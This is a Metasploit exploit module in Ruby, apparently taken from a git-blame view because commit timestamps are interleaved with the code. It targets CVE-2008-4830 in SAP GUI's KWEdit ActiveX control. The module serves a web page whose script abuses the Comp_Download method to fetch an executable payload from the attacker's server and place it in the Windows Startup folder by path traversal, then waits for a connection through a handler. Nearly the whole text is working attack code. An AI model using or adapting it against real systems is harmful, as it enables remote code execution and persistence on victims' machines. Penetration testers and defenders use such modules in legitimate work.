2010-12-01 02:01:46 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
2012-02-21 01:40:50 +00:00
# web site for more information on licensing and terms of use.
# http://metasploit.com/
2010-12-01 02:01:46 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
include Msf :: Exploit :: Remote :: HttpServer :: HTML
include Msf :: Exploit :: EXE
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'EnjoySAP SAP GUI ActiveX Control Arbitrary File Download' ,
'Description' = > %q{
This module allows remote attackers to place arbitrary files on a users file system
by abusing the " Comp_Download " method in the SAP KWEdit ActiveX Control ( kwedit . dll 6400 . 1 . 1 . 41 ) .
} ,
'License' = > MSF_LICENSE ,
'Author' = > [ 'MC' ] ,
'References' = >
[
[ 'CVE' , '2008-4830' ] ,
[ 'OSVDB' , '53680' ] ,
[ 'URL' , 'http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf' ] ,
] ,
'DefaultOptions' = >
{
'InitialAutoRunScript' = > 'migrate -f' ,
} ,
'Payload' = >
{
'Space' = > 2048 ,
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Targets' = >
[
[ 'Automatic' , { } ] ,
] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'Apr 15 2009' ) )
register_options (
[
OptString . new ( 'PATH' , [ true , 'The path to place the executable.' , '/../../../../../../../../Documents and Settings/All Users/Start Menu/Programs/Startup/' ] ) ,
] , self . class )
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri ( cli , request )
payload_url = " http:// "
payload_url += ( datastore [ 'SRVHOST' ] == '0.0.0.0' ) ? Rex :: Socket . source_address ( cli . peerhost ) : datastore [ 'SRVHOST' ]
payload_url += " : " + datastore [ 'SRVPORT' ] . to_s + get_resource ( ) + " /payload "
if ( request . uri . match ( / payload / ) )
return if ( ( p = regenerate_payload ( cli ) ) == nil )
data = generate_payload_exe ( { :code = > p . encoded } )
print_status ( " Sending EXE payload " )
send_response ( cli , data , { 'Content-Type' = > 'application/octet-stream' } )
return
end
vname = rand_text_alpha ( rand ( 100 ) + 1 )
exe = rand_text_alpha ( rand ( 20 ) + 1 )
content = % Q |
2010-12-01 02:01:46 +00:00
< html >
< head >
2013-08-30 21:28:54 +00:00
< script >
try {
var #{vname} = new ActiveXObject('Kweditcontrol.KWedit.1');
#{vname}.Comp_Download("#{payload_url}","#{datastore['PATH']}/#{exe}.exe");
} catch ( e ) { window . location = 'about:blank' ; }
< / script>
2010-12-01 02:01:46 +00:00
< / head>
< / html>
2013-08-30 21:28:54 +00:00
|
2010-12-01 02:01:46 +00:00
2013-08-30 21:28:54 +00:00
print_status ( " Sending #{ self . name } " )
2010-12-01 02:01:46 +00:00
2013-08-30 21:28:54 +00:00
send_response_html ( cli , content )
2010-12-01 02:01:46 +00:00
2013-08-30 21:28:54 +00:00
handler ( cli )
2010-12-01 02:01:46 +00:00
2013-08-30 21:28:54 +00:00
end
2010-12-01 02:01:46 +00:00
end